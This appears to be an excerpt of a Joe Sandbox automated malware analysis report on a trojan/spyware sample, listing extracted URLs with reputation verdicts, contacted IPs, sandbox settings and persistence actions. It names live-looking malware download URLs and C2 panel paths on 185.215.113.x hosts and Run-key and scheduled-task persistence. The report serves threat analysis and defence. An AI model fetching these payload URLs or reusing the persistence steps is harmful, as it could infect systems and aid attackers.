                                      http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceRegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id13ResponseDRegAsm.exe, 00000021.00000002.2744975325.0000000003499000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/faultRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.117/inc/gold.exeaxplong.exe, 0000001B.00000002.3769503003.000000000143D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/10/wsatRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id15ResponseRegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.37/atab74664dd7e.exe, 0000000E.00000002.2586371888.0000000001328000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#axplong.exe, 0000001B.00000002.3771028122.00000000015F9000.00000004.00000020.00020000.00000000.sdmp, 66ed86be077bb_12.exe.27.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://api.ip.sb/ipgold.exe, 0000001F.00000002.2104172556.0000000003775000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2737248313.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id1ResponseDRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.100/steam/random.exeaxplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.43/Zu7JuNko/index.php020001skotes.exe, 0000000B.00000002.3769918015.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id24ResponseRegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedRegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id21ResponseDRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.16/dobre/splwow64.exeaxplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressingRegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.leopardi.nl/frm/_vti_cnf/Blenar.exeCaxplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zaxplong.exe, 0000001B.00000002.3771028122.00000000015F9000.00000004.00000020.00020000.00000000.sdmp, 66ed86be077bb_12.exe.27.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://194.116.215.195/12dsvc.exeaxplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://tempuri.org/Entity/Id10ResponseDRegAsm.exe, 00000021.00000002.2744975325.0000000003302000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id5ResponseRegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsRegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id15ResponseDRegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id10ResponseRegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.16/inc/2.exeaxplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RenewRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id8ResponseRegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.43/15.113.43/fae1daa8e9eb4e4f9b5846d934f48b15eaa495c49##Rskotes.exe, 0000000B.00000002.3769918015.00000000014D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://ocsp.sectigo.com0axplong.exe, 0000001B.00000002.3771028122.00000000015F9000.00000004.00000020.00020000.00000000.sdmp, 66ed86be077bb_12.exe.27.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2006/02/addressingidentityRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.43/Zu7JuNko/index.phpRskotes.exe, 0000000B.00000002.3769918015.0000000001516000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.43/Zu7JuNko/index.phpOskotes.exe, 0000000B.00000002.3769918015.00000000014D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/DRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.26/Nework.exeaxplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/06/addressingexRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.37Ib74664dd7e.exe, 00000013.00000002.2673207759.0000000000FAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseRegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.16/Jo89Ku7d/index.php1Kaxplong.exe, 0000001B.00000002.3769503003.000000000140E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      		unknown
                                      http://185.215.113.37/tSwfb74664dd7e.exe, 0000001D.00000002.2792862379.000000000122B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://103.130.147.211/Files/2.exeRaxplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.37/e2b1563c6670f193.phpWindows3ec4738210.exe, 0000000F.00000002.2352900147.0000000000DCD000.00000004.00000020.00020000.00000000.sdmp, b74664dd7e.exe, 00000013.00000002.2673207759.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, b74664dd7e.exe, 0000001D.00000002.2792862379.000000000127E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://tempuri.org/Entity/Id13ResponseRegAsm.exe, 00000021.00000002.2744975325.0000000003499000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id12ResponseDRegAsm.exe, 00000021.00000002.2744975325.0000000003302000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyRegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.37m3ec4738210.exe, 0000000D.00000002.1976198696.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.16/inc/penis.exeaxplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      		unknown
                                      http://tempuri.org/Entity/Id7ResponseDRegAsm.exe, 00000021.00000002.2744975325.0000000003499000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementRegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.43/Zu7JuNko/index.phpoftskotes.exe, 0000000B.00000002.3769918015.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.215.113.43
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLtrue
                                      194.116.215.195
                                      		unknownunknown
                                      		44676VMAGE-ASRUfalse
                                      185.215.113.100
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLfalse
                                      185.215.113.37
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLtrue
                                      185.215.113.26
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLfalse
                                      46.19.218.204
                                      		www.leopardi.nlNetherlands
                                      		20559FUNDAMENTS-ASNLfalse
                                      103.130.147.211
                                      		unknownTurkey
                                      		63859MYREPUBLIC-AS-IDPTEkaMasRepublikIDtrue
                                      185.215.113.16
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLtrue
                                      147.45.44.104
                                      		unknownRussian Federation
                                      		2895FREE-NET-ASFREEnetEUfalse
                                      95.179.250.45
                                      		unknownNetherlands
                                      		20473AS-CHOOPAUStrue
                                      185.215.113.117
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLfalse
                                      185.215.113.103
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1516777
                                      Start date and time:2024-09-24 15:32:44 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 14m 45s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:46
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@39/57@1/12
                                      EGA Information:
                                      • Successful, ratio: 28.6%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.189.173.20, 20.42.73.29, 52.168.117.173
                                      • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, garageserviceoperation.com, slscr.update.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, time.windows.com, HAYtAoQHDCIZfrnmkrkib.HAYtAoQHDCIZfrnmkrkib, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, solutionhub.cc, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, fivevh5vs.top, crl3.digicert.com, umwatson.events.data.microsoft.com, crl4.digicert.com, conditionprovice.pro
                                      • Execution Graph export aborted for target 3ec4738210.exe, PID 7672 because there are no executed function
                                      • Execution Graph export aborted for target 3ec4738210.exe, PID 8032 because there are no executed function
                                      • Execution Graph export aborted for target b74664dd7e.exe, PID 7812 because there are no executed function
                                      • Execution Graph export aborted for target file.exe, PID 5256 because it is empty
                                      • Execution Graph export aborted for target skotes.exe, PID 1648 because there are no executed function
                                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size exceeded maximum capacity and may have missing network information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: file.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      09:34:01API Interceptor2119804x Sleep call for process: skotes.exe modified
                                      11:33:18API Interceptor483196x Sleep call for process: b74664dd7e.exe modified
                                      11:33:29API Interceptor747x Sleep call for process: 3ec4738210.exe modified
                                      11:33:49API Interceptor3x Sleep call for process: WerFault.exe modified
                                      11:33:49API Interceptor1403142x Sleep call for process: axplong.exe modified
                                      11:34:57API Interceptor49x Sleep call for process: RegAsm.exe modified
                                      15:33:45Task SchedulerRun new task: skotes path: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      17:33:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 3ec4738210.exe C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe
                                      17:33:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run b74664dd7e.exe C:\Users\user\1000015002\b74664dd7e.exe
                                      17:33:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 3ec4738210.exe C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe
                                      17:33:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run b74664dd7e.exe C:\Users\user\1000015002\b74664dd7e.exe
                                      17:33:45Task SchedulerRun new task: axplong path: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                                      17:36:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run splwow64.exe C:\Users\user~1\AppData\Local\Temp\1000287001\splwow64.exe
                                      17:36:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4d72d15151.exe C:\Users\user~1\AppData\Local\Temp\1000308001\4d72d15151.exe
                                      17:36:27Task SchedulerRun new task: Tuition path: wscript s>//B "C:\Users\user\AppData\Local\QuantumDynamics Lab\QuantumFlow.js"
                                      17:36:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run splwow64.exe C:\Users\user~1\AppData\Local\Temp\1000287001\splwow64.exe
                                      17:36:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4d72d15151.exe C:\Users\user~1\AppData\Local\Temp\1000308001\4d72d15151.exe
                                      17:36:46AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
